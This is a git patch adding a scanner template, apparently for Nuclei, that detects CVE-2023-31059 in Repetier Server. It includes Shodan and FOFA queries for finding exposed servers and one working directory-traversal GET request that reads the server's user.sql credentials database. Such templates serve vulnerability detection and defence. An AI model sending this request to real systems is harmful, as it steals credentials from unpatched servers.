From 6ef29cb29e326d54c77bb72d84c6095e0aee6f2e Mon Sep 17 00:00:00 2001 From: Parth Malhotra <28601533+parthmalhotra@users.noreply.github.com> Date: Tue, 9 May 2023 21:30:06 +0530 Subject: [PATCH] Create CVE-2023-31059.yaml --- http/cves/2023/CVE-2023-31059.yaml | 32 ++++++++++++++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 http/cves/2023/CVE-2023-31059.yaml diff --git a/http/cves/2023/CVE-2023-31059.yaml b/http/cves/2023/CVE-2023-31059.yaml new file mode 100644 index 0000000000..523759a97b --- /dev/null +++ b/http/cves/2023/CVE-2023-31059.yaml @@ -0,0 +1,32 @@ +id: CVE-2023-31059 + +info: + name: SQLite File Detection + author: parthmalhotra, pdresearch + severity: high + description: Repetier Server through 1.4.10 allows ..%5c directory traversal for reading files that contain credentials, as demonstrated by connectionLost.php. + reference: + - https://cybir.com/2023/cve/poc-repetier-server-140/ + - https://www.repetier-server.com/download-repetier-server/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2023-31059 + cwe-id: CWE-22 + epss-score: 0.00086 + cpe: cpe:2.3:a:repetier-server:repetier-server:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + verified: true + shodan-query: title:"Repetier-Server" + fofa-query: title="Repetier-Server" + +requests: + - method: GET + path: + - "{{BaseURL}}/views..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cProgramData%5cRepetier-Server%5cdatabase%5cuser.sql%20/base/connectionLost.php" + matchers: + - type: binary + part: body + binary: + - 53514C69746520666F726D6174203300